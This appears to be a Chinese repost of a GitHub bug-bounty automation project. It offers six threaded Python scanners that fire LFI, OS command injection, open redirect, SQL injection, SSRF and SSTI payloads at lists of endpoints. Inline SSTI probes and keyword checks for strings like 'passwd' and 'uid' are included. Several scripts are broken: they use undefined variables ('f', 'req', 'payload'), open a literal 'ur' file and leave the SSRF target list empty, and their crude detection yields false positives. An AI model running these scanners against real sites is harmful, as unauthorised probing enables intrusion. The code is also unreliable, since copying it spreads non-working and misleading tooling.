漏洞赏金自动化工具 (包含LFI、OS命令执行、重定向、SQL注入、SSRF、SSTI攻击)

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/Mostafa-Elguerdawi/Automation_Bug_Hunting

本地文件包含漏洞(LFI)

LFI.py

import requests
import threading

payloads = open('/home/melguerdawi/Desktop/Pentest/Web/hunt/Automation/LFI/LFI.txt', 'r').read().split('\n')

def test_lfi(url, payload):
    for u in url:
        al = f"{u}{payload}"
        payload_response = requests.get(al)
        normal_response = requests.get(al)
    
        if len(payload_response.text) > len(normal_response.text):
            print(f"LFI vulnerability found with payload: {al}")
            lfi = open('/home/melguerdawi/Desktop/Pentest/Web/hunt/Automation/LFI/LFI_results.txt', 'a')
            f.write(f"{al}\n")


ur = input("Enter EndPoints Path >>> ")
url = open(ur, 'r').read().split('\n')
threads = []
for payload in payloads:
    t = threading.Thread(target=test_lfi, args=(url, payload))
    threads.append(t)
    t.start()
for t in threads:
    t.join()

LFI.txt字典

OS命令执行

OS_Injection.py

import threading
import requests


payloads = open('OS.txt', 'r').read().split('\n')

def test_os_cmd_injection(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if "uid" in r.text or "root" in r.text or "list" in r.text or "-rw" in r.text or "www-data" in r.text or "passwd" in r.text or "Local Address" in req.text or "System" in r.text or "C:" in r.text or "apache" in req.text:
                print(f"[+] OS Command Injection found: {url}{payload}")
                with open("os_cmd_injection_results.txt", "a") as f:
                    f.write(f"{al}\n")
    except:
        pass


ur = input("Enter EndPoints Path >>> ")
url = open('ur', 'r').read().split('\n')
threads = []
for payload in payloads:
    t = threading.Thread(target=test_os_cmd_injection, args=(url, payload))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

OS.txt

重定向漏洞

Open_Redirect.py

import threading
import requests


payloads = open('Open_Redirect.txt', 'r').read().split('\n')

def test_open_redirect(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if r.status_code == 200:
                if r.url != url:
                    print(f"[+] Open Redirect found: {al}")
                    with open("open_redirect_results.txt", "a") as f:
                        f.write(f"{al}\n")
    except:
        pass


ur = input("Enter EndPoints Path >>> ")
url = open(ur, 'r').read().split('\n')
threads = []
for payload in payloads:
    t = threading.Thread(target=test_open_redirect, args=(url, payload))
    threads.append(t)
    t.start()


for t in threads:
    t.join()

Open_Redirect.txt

SQL注入

SQLI.py

import threading
import requests


payloads = open('SQLI.txt', 'r').read().split('\n')

def test_sql_injection(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if "SQL" in r.text.upper() or "Error" in r.text.lower():
                print(f"[+] SQL Injection found: {al}")
                sqli = open('SQLI_result.txt', 'a')
                sqli.write(f"{al}\n")
                
    except Exception as e:
        print(e)

ur = input("Enter EndPoints Path >>> ")
url = open(ur, 'r').read().split('\n')
threads = []
for payload in payloads:
    t = threading.Thread(target=test_sql_injection, args=(url, payload))
    threads.append(t)
    t.start()


for t in threads:
    t.join()

SQLI.txt

SSRF攻击

SSRF.py

import threading
import requests

urls = ['', '']

def test_ssrf(url, test_url):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if r.status_code == 200:
                print(f"[+] SSRF found: {al}")
                ssrf = open('SSRF_results.txt', 'a')
                ssrf.write(f"{al}\n")
            
    except Exception as e:
        print(e)


ur = input("Enter EndPoints Path >>> ")
url = open(ur, 'r').read().split('\n')
threads = []
for test_url in urls:
    t = threading.Thread(target=test_ssrf, args=(url, test_url))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

SSTI攻击

SSTI.py

import threading
import requests


payloads = ["{{7*7}}", "{{7+7}}", "{{config.items()}}", "{{7*'7'}}", "<%= 7 * 7 %>", "${7*7}", "${{7*7}}", "@(7+7)", "#{7*7}", "#{ 7 * 7 }"]


def test_ssti(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if "49" in r.text or "14" in r.text or "config" in r.text or "7777777" in r.text:
                print(f"[+] SSTI found: {al}")
                with open("ssti_results.txt", "a") as f:
                    f.write(f"{al}\n")
    except:
        pass


ur = input("Enter EndPoints Path >>> ")
url = open(ur, 'r').read().split('\n')
threads = []
for payload in payloads:
    t = threading.Thread(target=test_ssti, args=(url, payload))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

 

 

标签:工具分享, 漏洞赏金